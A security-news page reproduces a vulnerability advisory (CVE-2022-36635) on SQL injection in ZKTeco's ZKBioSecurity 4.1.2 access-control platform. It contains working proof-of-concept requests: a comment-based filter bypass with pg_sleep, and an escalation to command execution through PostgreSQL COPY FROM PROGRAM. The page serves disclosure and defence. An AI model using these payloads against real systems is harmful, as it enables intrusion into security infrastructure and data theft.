Security
Headlines
HeadlinesLatestCVEs

Headline

ZKSecurity BIO 4.1.2 SQL Injection / Code Execution

ZKSecurity BIO version 4.1.2 suffers from a remote SQL injection vulnerability that can allow for remote code execution.

Packet Storm
#sql#vulnerability#web#ios#intel#rce#bios
#######################ADVISORY INFORMATION#######################Product: ZKSecurity BIOVendor: ZKTeco (https://www.zkteco.com/en/ZKBiosecurity/ZKBioSecurity_V5000_4.1.2)Version Affected: 4.1.2CVE: CVE-2022-36635Vulnerability: SQL Injection (with a plus: RCE)#######################CREDIT#######################This vulnerability was discovered and researched by Caio Burgardt andSilton Santos.#######################INTRODUCTION#######################Based on the hybrid biometric technology and computer vision technology,ZKBioSecurity provides a comprehensive web-based security platform. Itcontains multiple integrated modules: personnel, time & attendance, accesscontrol, visitor management, offline & online consumption management, guardpatrol, parking, elevator control, entrance control, Facekiosk, intelligentvideo management, mask and temperature detection module, and other smartsub-systems.#######################VULNERABILITY DETAILS#######################The parameters opTimeBegin e opTimeEnd are simply concatenated to the SQLquery, with only a sanitization filter in front of it. Using comments(/**/) in place of spaces was enough to confuse and bypass the filter.#######################PROOF OF CONCEPT#######################Note that the request delayed 10s:POST /baseOpLog.do HTTP/1.1Host: {HOST}Content-Type: application/x-www-form-urlencodedCookie: SESSION={COOKIE}; menuType=icon-onlyContent-Length: 208list&pageSize=50&opTimeBegin=2022-06-26%2000:00:00')/**/tmp_count;select/**/pg_sleep(10);/**/select+1+from+BASE_OPLOG/**/WHERE/**/'1'='1&opTimeEnd=2022-09-26%2023:59:59&sortName=&sortOrder=&posStart=0&count=50if you use the next query, you can execute remote command:list&pageSize=50&opTimeBegin=2022-04-11%2000:00:00&opTimeEnd=2022-07-11%2023:59:59')/**/tmp_count;DROP/**/TABLE/**/IF/**/EXISTS/**/cmd_exec;CREATE/**/TABLE/**/cmd_exec/**/(cmd_output/**/text);COPY/**/cmd_exec/**/FROM/**/PROGRAM/**/'ping+domain';SELECT/**/*/**/FROM/**/cmd_exec;/**/SeLECT/**/count/**/(1)/**/fRom/**/(SeLECT/**/t.CREATE_TIME/**/fROM/**/BASE_OPLOG/**/t/**/where/**/'1'='#######################END#######################

Related news

CVE-2022-36635

ZKteco ZKBioSecurity V5000 4.1.3 was discovered to contain a SQL injection vulnerability via the component /baseOpLog.do.

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution